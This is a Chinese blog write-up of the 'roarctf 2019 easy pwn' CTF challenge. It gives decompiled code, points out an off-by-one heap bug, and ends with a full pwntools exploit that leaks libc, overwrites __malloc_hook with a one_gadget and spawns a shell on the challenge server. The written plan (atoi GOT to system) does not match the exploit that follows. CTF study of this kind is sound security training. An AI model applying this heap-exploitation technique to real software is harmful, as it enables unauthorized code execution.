Zephyr's Repository Zephyr's Repository
首页
笔记
技术
更多
收藏
关于
  • 📂 分类
  • 🏷️ 标签
  • 📅 归档

Zephyr

偷得浮生半日闲
首页
笔记
技术
更多
收藏
关于
  • 📂 分类
  • 🏷️ 标签
  • 📅 归档
  • Web

  • PWN

    • test your nc
    • rip
    • warmup csaw 2016
    • ciscn 2019 n 1
    • pwn1 sctf 2016
    • jarvisoj level0
    • ciscn 2019 c 1
    • 第五空间2019 决赛 PWN5
    • ciscn 2019 n 8
    • jarvisoj level2
    • OGeek2019 babyrop
    • get started 3dsctf 2016
    • bjdctf 2020 babystack
    • ciscn 2019 en 2
    • HarekazeCTF2019 baby rop
    • jarvisoj level2 x64
    • not the same 3dsctf 2016
    • ciscn 2019 n 5
    • others shellcode
    • ciscn 2019 ne 5
    • 铁人三项(第五赛区) 2018 rop
    • bjdctf 2020 babyrop
    • bjdctf 2020 babyrop2
    • jarvisoj fm
    • pwn2 sctf 2016
    • babyheap 0ctf 2017
    • HarekazeCTF2019_baby_rop2
    • ciscn 2019 es 2
    • ciscn 2019 s 3
    • jarvisoj tell me something
    • jarvisoj level3
    • ez pz hackover 2016
    • picoctf 2018 rop chain
    • Black Watch 入群题 PWN
    • jarvisoj level4
    • jarvisoj level3 x64
    • bjdctf 2020 babyrop2
    • ZJCTF 2019 EasyHeap
    • pwnable orw
    • wustctf2020 getshell
    • bjdctf 2020 router
    • hitcontraining uaf
    • picoctf 2018 buffer overflow 1
    • jarvisoj test your memory
    • mrctf2020 shellcode
    • inndy rop
    • picoctf 2018 buffer overflow 2
    • cmcc simplerop
    • xdctf2015 pwn200
    • bbys tu 2016
    • mrctf2020 easyoverflow
    • wustctf2020 getshell 2
    • ZJCTF 2019 Login
    • babyfengshui 33c3 2016
    • jarvisoj level1
    • ciscn 2019 s 4
    • ciscn 2019 n 3
    • hitcontraining magicheap
    • axb 2019 fmt32
    • gyctf 2020 borrowstack
    • wustctf2020 closed
    • pwnable start
    • others babystack
    • 0ctf 2017 babyheap
    • hitcontraining heapcreator
    • roarctf 2019 easy pwn
      • 前提
        • 查看文件保护
      • 静态分析
      • 思路分析
      • exp
  • 笔记
  • PWN
Zephyr
2022-04-21
目录

roarctf 2019 easy pwn

# roarctf 2019 easy pwn

# 前提

# 查看文件保护

[*] '/root/pwn/buuctf/roarctf_2019_easy_pwn/roarctf_2019_easy_pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
1
2
3
4
5
6

# 静态分析

主函数如下:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int option; // [rsp+4h] [rbp-Ch]

  setbuf(a1, a2, a3);
  while ( 1 )
  {
    menu();
    option = getNumber(option);
    switch ( option )
    {
      case 1:
        create();
        break;
      case 2:
        puts("Tell me the secret about you!!");
        edit();
        break;
      case 3:
        delete();
        break;
      case 4:
        show();
        break;
      case 5:
        return 0LL;
      default:
        puts("Wrong try again!!");
        break;
    }
  }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

menu函数如下:

int menu()
{
  puts("Note system");
  puts("1. create a note");
  puts("2. write note");
  puts("3. drop the note");
  puts("4. show the note");
  puts("5. exit");
  return printf("choice: ");
}
1
2
3
4
5
6
7
8
9
10

create函数如下:

__int64 create()
{
  __int64 result; // rax
  int index; // [rsp+4h] [rbp-1Ch]
  int v2; // [rsp+8h] [rbp-18h]
  int size; // [rsp+8h] [rbp-18h]
  void *ptr; // [rsp+10h] [rbp-10h]

  result = 0LL;
  for ( index = 0; index <= 15; ++index )
  {
    result = notelist[index].isUse;
    if ( !result )
    {
      printf("size: ");
      size = getNumber(v2);
      if ( size > 0 )
      {
        if ( size > 4096 )
          size = 4096;
        ptr = calloc(size, 1uLL);
        if ( !ptr )
          exit(-1);
        notelist[index].isUse = 1;
        notelist[index].size = size;
        notelist[index].content = ptr;
        printf("the index of ticket is %d \n", index);
      }
      return index;
    }
  }
  return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

edit函数如下:

__int64 edit()
{
  int v1; // [rsp+Ch] [rbp-14h]
  int index; // [rsp+Ch] [rbp-14h]
  int idx; // [rsp+10h] [rbp-10h]
  unsigned int size; // [rsp+14h] [rbp-Ch]

  printf("index: ");
  index = getNumber(v1);
  idx = index;
  if ( index >= 0 && index <= 15 )
  {
    index = notelist[index].isUse;
    if ( index == 1 )
    {
      printf("size: ");
      index = getNumber(1);
      size = getSize(notelist[idx].size, index);// off-by-one
      if ( index > 0 )
      {
        printf("content: ");
        index = readContent(notelist[idx].content, size);
      }
    }
  }
  return index;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

getSize函数如下:

__int64 __fastcall getSize(int a1, unsigned int a2)
{
  __int64 result; // rax

  if ( a1 > a2 )
    return a2;
  if ( a2 - a1 == 10 )
    LODWORD(result) = a1 + 1;
  else
    LODWORD(result) = a1;
  return result;
}
1
2
3
4
5
6
7
8
9
10
11
12

delete函数如下:

__int64 delete()
{
  int index; // eax
  int idx; // [rsp+Ch] [rbp-14h]
  int v3; // [rsp+10h] [rbp-10h]
  __int64 isUse; // [rsp+10h] [rbp-10h]

  printf("index: ");
  index = getNumber(v3);
  isUse = index;
  idx = index;
  if ( index >= 0LL && index <= 15LL )
  {
    isUse = notelist[index].isUse;
    if ( isUse == 1 )
    {
      notelist[index].isUse = 0;
      notelist[index].size = 0;
      free(notelist[index].content);
      notelist[idx].content = 0LL;
    }
  }
  return isUse;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

show函数如下:

__int64 show()
{
  int v1; // [rsp+0h] [rbp-10h]
  int index; // [rsp+0h] [rbp-10h]
  int idx; // [rsp+4h] [rbp-Ch]

  printf("index: ");
  index = getNumber(v1);
  idx = index;
  if ( index >= 0 && index <= 15 )
  {
    index = notelist[index].isUse;
    if ( index == 1 )
    {
      printf("content: ");
      index = writeContent(notelist[idx].content, notelist[idx].size);
    }
  }
  return index;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

# 思路分析

  1. 目前信息:

    • getSize函数存在off-by-one
    • Full RELRO
    • Canary found
    • NX enabled
    • PIE enabled
  2. 思路

    • 先调用create_heap函数3次创建6个大小都为0x20的堆块,再利用off-by-one修改下一个堆块的size域,并将其释放,再重新申请回来后,与其下一个堆块重叠,修改重叠部分中指向content的指针为atoi的got表地址,利用show函数泄漏libc,再覆盖atoi的plt为system地址,最后传入sh即可获得shell

# exp

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/roarctf_2019_easy_pwn/roarctf_2019_easy_pwn'
libcfile = '/root/pwn/buuctf/roarctf_2019_easy_pwn/libc-2.23.so'
io = remote('node4.buuoj.cn', 28480)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF(libcfile)

def create(io, size):
    io.sendlineafter('choice: ', '1')
    io.sendlineafter('size: ', str(size))

def edit(io, index, size, content):
    io.sendlineafter('choice: ', '2')
    io.sendlineafter('index: ', str(index))
    io.sendlineafter('size: ', str(size))
    io.sendlineafter('content: ', content)

def delete(io, index):
    io.sendlineafter('choice: ', '3')
    io.sendlineafter('index: ', str(index))

def show(io, index):
    io.sendlineafter('choice: ', '4')
    io.sendlineafter('index: ', str(index))

create(io, 0x18)  # 0
create(io, 0x10)  # 1
create(io, 0x80)  # 2
create(io, 0x10)  # 3
edit(io, 0, 0x18+10, b'a'*0x18+p8(0xb1))
edit(io, 2, 0x80+10, b'a'*0x80+p8(0xb0))
delete(io, 1)
create(io, 0x10)  # 1
show(io, 2)
leak_malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))-0x68
log.success("leak_malloc_hook:"+hex(leak_malloc_hook))
libc_base = leak_malloc_hook-libc.symbols['__malloc_hook']
realloc = libc_base + libc.symbols['__libc_realloc']
log.success("libc_base:"+hex(libc_base))
fake_fd = leak_malloc_hook-0x23
create(io, 0x60)  # 4
delete(io, 4)
edit(io, 2, 0x9, p64(fake_fd))
create(io, 0x60)  # 4
create(io, 0x60)  # 5
one_gadget = 0xf1147
payload = flat(['a'*0xb, libc_base+one_gadget, realloc+4])
edit(io, 5, len(payload), payload)
create(io, 0x10)  # 6
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#buuctf#pwn#heap
上次更新: 2022/08/15, 00:29:49
hitcontraining heapcreator

← hitcontraining heapcreator

最近更新
01
0CTF 2016 piapiapia
07-23
02
CISCN 2019 初赛 Love
07-22
03
PHP反序列化
07-21
更多文章>
Theme by Vdoing | Copyright © 2021-2022 Zephyr | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式
×